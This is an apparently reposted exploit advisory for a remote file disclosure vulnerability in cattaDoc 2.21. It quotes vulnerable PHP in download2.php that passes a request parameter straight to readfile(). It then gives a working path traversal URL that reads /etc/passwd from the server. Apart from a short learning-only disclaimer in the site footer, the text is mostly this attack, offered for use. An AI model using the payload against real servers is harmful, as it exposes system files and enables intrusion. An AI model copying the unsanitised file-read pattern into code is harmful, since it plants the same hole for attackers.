# cattaDoc 2.21(download2.php fn1)Remote File Disclosure Vulnerability # D.Script: http://cattadoc.com/download/cattadoc-2.21.tgz # Discovered by: GolD_M = [Mahmood_ali] # Homepage: http://www.Tryag.cc # Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay\'s Group # V.Code: ############################################################## # $tp = $_REQUEST[\'mtp\']; # # $ofn = \'\"\'.$_REQUEST[\'fn2\'].\'\"\'; # # header(\"Content-type: $tp\"); # # header(\"Content-Disposition: attachment; filename=$ofn\"); # # readfile($_REQUEST[\'fn1\']); <<---- # ############################################################## # Exploit:[Path_cattaDoc]/download2.php?fn1=../../../../../../etc/passwd
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论